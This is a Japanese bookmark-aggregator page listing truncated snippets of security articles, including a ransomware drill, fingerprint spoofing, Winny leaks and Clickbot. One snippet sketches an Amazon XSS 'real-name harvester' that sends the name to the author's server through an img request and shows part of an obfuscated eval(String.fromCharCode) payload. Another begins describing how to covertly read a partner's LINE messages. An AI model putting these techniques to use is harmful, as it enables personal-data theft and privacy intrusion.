自社のクラウド環境に侵入され、データベースから経営に欠かせないデータを持ち出される。バックアップも消され、データを取り戻したければ、身代金を支払うよう要求される──企業にとって絶対に直面したくない事態の一つだ。しかしこのシチュエーションをあえて再現し、訓練という形で自社のCEOに身代金まで要求した企業がある。クラウド会計サービスを提供するfreeeだ。 freeeは2021年10月、標的型攻撃とランサムウェアを組み合わせたシナリオを基に全社的な訓練を実施。AWS上のDBからデータを盗み出し、バックアップを消した上で、自社のCEOに社内SNSを通して身代金を要求したという。訓練を主導したのは、製品やサービスのセキュリティ向上を目指す社内組織「PSIRT」だ。 訓練を実施した背景には、情報システム部などのIT部門だけでなく、経営層まで巻き込みたい考えがあったという。同社のPSIRTが取り組んだ
PCやスマートフォンの認証方法として指紋認証を利用している人も多いはず。しかし、実は指紋認証は本人不要・指紋で汚れた端末の写真さえあれば、5ドル(約550円)程度で作成した「偽指紋」で簡単に突破できてしまうことが、ムービーで示されています。 Your Fingerprint Can Be Hacked For $5. Here’s How. - Kraken Blog https://blog.kraken.com/post/11905/your-fingerprint-can-be-hacked-for-5-heres-how/ 指紋がいかに簡単に偽造できてしまうのかは、以下のムービーを見るとよくわかります。 Kraken Security Labs Bypasses Biometric Security With $5 In Materials - YouTube PCやスマートフォン
みんなで使おうサイバーセキュリティ・ポータルサイト
今やオフィスも家庭も無線LANが当たり前になってきて、兼任情シスだろうがなんだろうが無線の面倒まで見なくてはいけないです。 そして、あまりにも便利なので利用者のニーズが高く、ちょっと不安定だとクレームも声高になりがちです。利用者自身で解消できることもあるのにー、みたいなイライラもあります。 実際トラブルに見舞われると、無線は目に見えない分、対処がしづらいです。 そんな無線LANが、今回のテーマとなります。 勉強なしに無線LANの世話をするのはキツイのです 適当に買ってきた機材をつないで、割と簡単にネットにつながってしまう製品も多いのですが、この勢いで設置すると早晩破綻します。 勉強する時間も気力もないなら、それを素直に認めて業者に任せましょう。 自宅で無線LANを運用していて、SSIDとパスワードと暗号化のところを理解してきちんと設定が出来ているのであれば、アクセスポイント1台まではなんと
■ 治外法権のeLTAX、マルウェア幇助を繰り返す無能業者は責任追及されて廃業に追い込まれよ ここ数年、不正送金の被害がインターネットバンキングの法人口座で急増しているという*1。その原因は今更言うまでもなく、Java実行環境(JRE)やAdobe製品の古いバージョンの脆弱性を突いてくるマルウェアである。しかしそれにしても、法人口座を扱うパソコンがなぜ、Java実行環境やAdobe製品をインストールしているのだろうか。インストールしなければ被害も起きないのに……。 その謎を解く鍵が、eLTAX(地方税ポータルシステム)にあるようだ。eLTAXでは、インターネットバンキングの口座を用いた納税ができることから、インターネットバンキング用のパソコンでeLTAXの利用環境も整えるということが普通になっていると思われる。そのeLTAXが、昨日までは、Java実行環境のインストールを強要していた。eL
最近芸能界がLINEだベッキーだで騒がしいのですね。 LINEの内容が漏れたのはハッキングだのLINEサーバーからの流出だの言われてるけど恐らく違う。 なぜなら私はそれ以外の方法で恋人のLINEをチェックしてたから。 備忘録として書いておきますのね。 まず前提としてiosである事。もう一つは古い機種がある事。 まあ若い子は古い携帯を残しておく人が多いだろうからやりやすいだろうね。 まず説明すると流出したとされるLINEのアイコンが四角なのね。 これが何を意味するかというと古いiosなのよ。 アップデートしてあるLINEってアイコンは丸なのよ。 古いiosって事は古い携帯って事なのね。 去年の年末に四角いアイコンってのはまず考えられない。 そんで恐らくゲスの方が機種変して新しいiphoneにLINEアカウントを移行したと思うんだけどその際に古い機種のLINEを削除しなかったんだよね。 この時
おはようございます。 ジェネストリームの秋貞です。 昨日は久しぶりに診断系アプリがFB上で話題になりましたね。 自分がFBのポストでよく使っているワードを可視化してくれるこれや、 私が Facebook 上で、よく使う言葉は? - 秋貞さんが Facebook でよく使っている言葉 FBのプロフィール写真から友達で同じことを考えている人を探してくれるこれなど。 プロフィール写真から判断して、友達のうちであなたと同じことを考えている人は誰? こういうのって面白いですよね。 真偽はともかくとして、意外な気づきがあったり、ツッコミのあるコメントが生成されて話が盛り上がったり。 しかしFB上で診断系アプリが話題になると、毎回翌日必ずこういう記事が出てきます。 yokotashurin.com 要は、個人情報を引っこ抜かれ、しかもそれが第三者が使えるようになってますよと注意喚起する記事です。 そして
こんにちは、yumiです。 テキストや画像、ウェブページや音声ファイルなど、集めたさまざまな情報をオンライン上に記録しておける『Evernote』。 かみあぷでも『Evernote』を使った名刺やライフログの保存方法などをご紹介してきましたが…その情報、知らないうちに公開されているかもしれません…。 今回は、公開されているノートを探す方法と、公開を停止する方法をご紹介します! 知らないうちに公開されているノートを探す方法 『Evernote』では、自分の作ったノートの公開ができます。例えば新しいノートを作成し、右下の「・・・」→「共有」→「リンクをコピー」をタップすれば、その時点でそのノートは公開され、リンクさえ分かれば誰でも閲覧が可能に。 では「リンクをコピー」さえしなければ、公開されないのか…というと、どうやらそうではないようです。 実際、私は『Food』という食事を記録できるアプリを
CtrlキーとShiftキーとEscキーの同時押しで起動するタスクマネージャを使うと、「プロセス」のところにいくつも「svchost.exe」というのが見えます。一体これはなんだろう?ということで怪しがって削除してしまったり、強制的に終了させてウインドウズごと強制再起動させられたりといった目にあった人もいるかと思います。 また、時々この「svchost.exe」がCPU使用率100%になってしまい、困っているが一体何が原因なのかわからない場合があります。そういった際に「svchost.exe」の正体を探る方法を知っていると問題解決に役立ちます。 というわけで、「svchost.exe」の正体を探る方法を紹介します。 Svchost.exe の説明 要するに、「svchost.exe」とは起動時に読み込まれる「サービス」であるわけですが、以下のタスクマネージャの例を見てもわかるように、一体ど
Microsoft Private Folder。ロックされた状態(左)とアンロックされた状態(右)のMy Private Folder Microsoftが提供する「Microsoft Private Folder 1.0」(以下、MPF)は、大切なファイルをパスワードにより保護するアドインツール。セキュリティ機能として見たときの目新しさは少ないものの、自分だけの"ないしょのフォルダ"を安全に、しかも手軽に維持管理できるという点では、他に類を見ないものだ。このたび「Windows Genuine Advantage Special Offers」として無償配布が開始されたこのツール、早速レポートしてみよう。 ありそうでなかった"ないしょのフォルダ" Windows NTの系譜に連なるWindowsには、ファイル/フォルダ単位でアクセス権を設定可能なファイルシステム「NTFS」が採用されて
↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 本名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9
ファイル共有(交換)ソフト「Winny(ウィニー)」のネットワークを介して拡散するウイルスにより、日本では深刻な情報漏えいが相次いでいます。米国でもこれら一連の事件はいろいろなメディアで報道されており、日本のインターネット社会が非常に深刻な事態に陥っているという認識が広まりつつあります。 私が所属する米eEye Digital Securityでも、遅ればせながらWinnyに関する本格的なリサーチを数週間前に開始しました。具体的には、Winnyのコード解析やWinnyネットワークの分析を通して、情報漏えいを防止するための手段など、Winnyにまつわる様々な事柄についてリサーチを進めています。後述するように、検出ツールも開発および公開しました。これらについては、主に私ともう一人の日本人エンジニアの金居が担当しています。 今回のリサーチやツール開発に関連した話題として、今回はWinnyを検出す
セキュリティ組織の米SANS Instituteは現地時間5月14日,Webサイトに張られた広告を不正にクリックしてお金を稼ごうとするボット(悪質なプログラム)が確認されたとして注意を呼びかけた。このようなボット(あるいはボットネット)は「Clickbot」などと呼ばれる。 確認されたボットネット(複数のボットによって構成される仮想的なネットワーク)がアクセスするのは,「Google AdSense」のような広告配信プログラムに参加しているWebサイトのテキスト広告あるいはイメージ広告(バナー)。こういったプログラムでは,Webサイトに張られた広告へのアクセス数に応じて,プログラムの主催者(例えば米Google)からそのサイトの管理者に料金が支払われる。 Clickbotはこういった広告プログラムを悪用する。Clickbotは,攻撃者が指定した広告へ自動的にアクセスしてアクセス数を増やし,
平塚で異母兄妹の遺体と身元不明の幼児一人、乳児二人の遺体が見つかった事件は謎が多い。合掌。 実母に殺された被害者がmixiに入っていた。 NHKは昼のニュースで、被害者のmixiの日記の一部を読み上げた。 一番最初に見つけたのは、たぶん2ちゃんねる。で、マスコミ各社、2ちゃんねるで、この手の blog・日記探し を見つけて拾ってますか。やれやれ。だったら 2ちゃんねるの悪口ばかり流す のはやめたら? ネタを拾わせて貰ってるくせに、悪口ばかり報道 って、仁義にもとりませんか? それとも 匿名掲示板だから、おいしい話だけ拾って商売 ですか? 毎日より。 平塚5遺体:殺害された利加香さん、ネットに書き込み 「友達って難しいな。今年に入ってなんかおかしいよ……もうやだ」。殺害された昨年10月12日未明、岡本利加香さんは、インターネットの会員制掲示板にこう書き込んでいた。 掲示板への書き込みによると
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く